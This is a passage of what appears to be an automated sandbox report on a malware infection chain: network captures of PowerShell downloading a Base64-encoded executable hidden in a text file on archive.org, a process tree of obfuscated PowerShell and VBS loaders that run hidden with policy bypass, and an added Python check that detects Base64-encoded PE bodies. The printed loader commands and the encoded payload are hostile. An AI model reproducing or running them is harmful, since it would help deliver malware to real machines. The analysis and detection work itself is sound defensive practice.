                                                Sep 25, 2024 18:50:19.113351107 CEST1236INData Raw: 41 41 42 67 43 77 50 74 2b 54 6b 2b 51 6e 50 2b 30 7a 6b 39 4d 59 50 70 30 6a 42 38 41 4e 50 2b 79 7a 68 38 77 45 50 78 77 54 41 37 67 38 4f 54 74 54 52 37 41 30 4f 7a 73 54 48 37 63 77 4f 41 6f 7a 33 35 38 2b 4e 7a 66 7a 49 33 51 67 4e 69 62 44
                                                Data Ascii: AABgCwPt+Tk+QnP+0zk9MYPp0jB8ANP+yzh8wEPxwTA7g8OTtTR7A0OzsTH7cwOAoz358+NzfzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm
                                                Sep 25, 2024 18:50:19.113431931 CEST1236INData Raw: 42 41 41 41 38 7a 34 2f 55 32 50 4f 35 44 75 2b 34 6d 50 57 35 7a 42 39 77 66 50 6a 32 6a 67 38 73 4e 50 4b 79 6a 64 38 73 47 50 67 78 7a 57 38 45 46 50 4d 78 6a 4d 38 63 78 4f 71 76 6a 30 37 6f 35 4f 30 74 7a 56 37 45 69 4f 33 72 44 32 34 6f 4c
                                                Data Ascii: BAAA8z4/U2PO5Du+4mPW5zB9wfPj2jg8sNPKyjd8sGPgxzW8EFPMxjM8cxOqvj07o5O0tzV7EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLA
                                                Sep 25, 2024 18:50:19.115319014 CEST1236INData Raw: 66 6a 34 33 34 39 4e 61 66 6a 31 33 49 39 4e 4f 66 6a 79 33 59 38 4e 43 66 6a 76 33 6f 37 4e 32 65 6a 73 33 34 36 4e 71 65 6a 70 33 49 36 4e 65 65 6a 6d 33 59 35 4e 53 65 6a 6a 33 6f 34 4e 47 65 6a 67 33 34 33 4e 36 64 6a 64 33 49 33 4e 75 64 6a
                                                Data Ascii: fj4349Nafj13I9NOfjy3Y8NCfjv3o7N2ejs346Nqejp3I6Neejm3Y5NSejj3o4NGejg343N6djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDf
                                                Sep 25, 2024 18:50:19.118315935 CEST1236INData Raw: 51 70 4e 42 61 6a 4d 32 59 51 4e 6f 57 54 6c 31 6b 55 4e 44 56 6a 49 31 30 52 4e 54 55 44 43 30 34 50 4e 30 54 6a 37 30 67 4f 4e 69 54 44 33 30 6f 4d 4e 41 54 44 75 30 30 4b 4e 6e 53 54 6f 30 6f 49 4e 43 53 54 52 30 30 44 4e 76 51 54 4a 30 59 42
                                                Data Ascii: QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomMgJjVywkMGBAABQBADAEA/whP11j29kDPmyzE7AoOvnDB4IPOcjTp4cIOshDS4EDOUgDDAAAAsAwAwAwPA+za/YlP+TjNzcOAAAAFAMAI


                                                Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49705 | Destination IP: 207.241.227.240 | Destination Port: 443 | PID: 1672 | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-09-25 16:50:12 UTC | 109 | OUT | GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                Host: ia600100.us.archive.org
                                                Connection: Keep-Alive
                                                2024-09-25 16:50:13 UTC | 606 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Wed, 25 Sep 2024 16:50:13 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 2823512
                                                Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                Connection: close
                                                ETag: "66e22cba-2b1558"
                                                Strict-Transport-Security: max-age=15724800
                                                Expires: Wed, 25 Sep 2024 22:50:13 GMT
                                                Cache-Control: max-age=21600
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                Access-Control-Allow-Credentials: true
                                                Accept-Ranges: bytes
                                                2024-09-25 16:50:13 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                                2024-09-25 16:50:13 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                                2024-09-25 16:50:13 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                2024-09-25 16:50:13 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                                Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                                2024-09-25 16:50:13 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                                Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                2024-09-25 16:50:13 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                                2024-09-25 16:50:13 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                2024-09-25 16:50:13 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                2024-09-25 16:50:13 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                                Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                2024-09-25 16:50:13 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC
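The DetahNoteV.txt response from archive.org is served as text/plain, but its first "Data Ascii" chunk starts with TVqQAAMAAAAEAAAA, which is the Base64 encoding of an MZ header, and the DOS stub text "This program cannot be run in DOS mode" is visible a few bytes further on. The Python below is an added example and not part of the Joe Sandbox report: it takes that first chunk as copied from the dump above, decodes it the way the sandbox's line truncation requires (dropping a trailing partial Base64 quartet), and parses the DOS and PE headers to confirm the body is a 32-bit PE. The two negative inputs at the end are constructed and are not from the capture.

```python
"""Added example: check whether a text/plain HTTP body is a Base64-encoded PE image."""
import base64
import re
import struct
from typing import Optional

# First "Data Ascii" chunk of the DetahNoteV.txt response, copied from the traffic dump above.
# The sandbox cuts the line, so the string may end on a partial Base64 quartet.
ARCHIVE_CHUNK = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA"

B64_SHAPE = re.compile(r"[A-Za-z0-9+/]+=*")


def b64_body_to_bytes(text: str) -> bytes:
    """Drop whitespace and any trailing partial quartet, then Base64-decode."""
    compact = "".join(text.split())
    compact = compact[: len(compact) - len(compact) % 4]
    return base64.b64decode(compact)


def inspect_pe(data: bytes) -> Optional[dict]:
    """Return basic header facts if `data` starts with a PE image, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]       # offset of the PE signature
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    opt_magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,                                    # 0x14C = i386
        "sections": nsections,
        "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(opt_magic, hex(opt_magic)),
        "dos_stub": b"This program cannot be run in DOS mode" in data[:e_lfanew],
    }


def classify_text_body(body: str) -> str:
    """Label a text/plain body as 'base64-pe', 'base64-other' or 'not-base64'."""
    compact = "".join(body.split())
    if not compact or not B64_SHAPE.fullmatch(compact):
        return "not-base64"
    try:
        raw = b64_body_to_bytes(body)
    except ValueError:                                         # binascii.Error is a ValueError
        return "not-base64"
    return "base64-pe" if inspect_pe(raw) else "base64-other"


if __name__ == "__main__":
    print(inspect_pe(b64_body_to_bytes(ARCHIVE_CHUNK)))
    print(classify_text_body(ARCHIVE_CHUNK))
```

A body that decodes to something other than a PE (the CHPPZA.txt response in session 1 begins with a long run of "A", i.e. zero bytes) gets "base64-other" here; deciding whether such a blob is a reversed, XORed or otherwise wrapped second stage needs the loader script, which this check does not attempt.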



                                                Target ID:0
                                                Start time:12:49:58
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                Wow64 process (32bit):true
                                                Commandline:mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta"
                                                Imagebase:0x420000
                                                File size:13'312 bytes
                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:1
                                                Start time:12:49:59
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
                                                Imagebase:0x790000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:12:49:59
                                                Start date:25/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:12:49:59
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
                                                Imagebase:0xfb0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:12:50:02
                                                Start date:25/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
                                                Imagebase:0xc10000
                                                File size:2'141'552 bytes
                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:5
                                                Start time:12:50:04
                                                Start date:25/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"
                                                Imagebase:0xf30000
                                                File size:46'832 bytes
                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:6
                                                Start time:12:50:09
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
                                                Imagebase:0x1b0000
                                                File size:147'456 bytes
                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:12:50:09
                                                Start date:25/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                Imagebase:0xfb0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
